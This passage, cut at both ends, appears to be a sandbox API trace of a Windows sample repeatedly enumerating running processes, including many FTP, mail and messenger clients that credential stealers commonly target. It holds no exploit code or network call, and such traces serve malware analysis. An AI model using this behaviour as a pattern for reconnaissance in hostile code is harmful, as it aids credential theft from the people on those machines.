szExeFile="utg2.exe")) returned 1 [0223.189] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0223.191] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0223.193] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0223.195] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0223.197] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0223.202] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0223.204] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0223.206] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0223.209] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0223.210] CloseHandle (hObject=0x2278) returned 1 [0223.211] Sleep (dwMilliseconds=0x64) [0223.327] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0223.339] Process32First (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0223.344] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0223.346] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0223.348] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0223.350] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0223.352] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0223.354] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0223.359] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0223.361] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0223.363] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.365] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.367] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0223.368] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.421] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.424] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.426] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.428] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.430] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.432] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.438] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0223.440] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0223.442] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0223.444] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.446] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0223.447] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0223.453] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0223.455] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0223.457] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0223.459] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.461] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0223.463] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0223.465] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0223.466] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0223.468] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0223.470] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0223.522] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0223.525] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0223.527] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0223.532] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0223.534] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0223.536] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0223.538] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0223.540] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0223.557] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0223.559] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0223.561] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0223.563] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0223.565] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0223.567] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0223.569] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0223.571] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0223.628] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0223.630] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0223.632] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0223.634] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0223.639] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0223.642] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0223.644] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0223.646] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0223.649] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0223.651] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0223.658] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0223.660] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0223.663] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0223.665] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0223.934] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0223.936] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0223.938] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0223.940] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0223.942] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0223.944] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0223.945] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0223.947] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0224.038] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0224.041] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 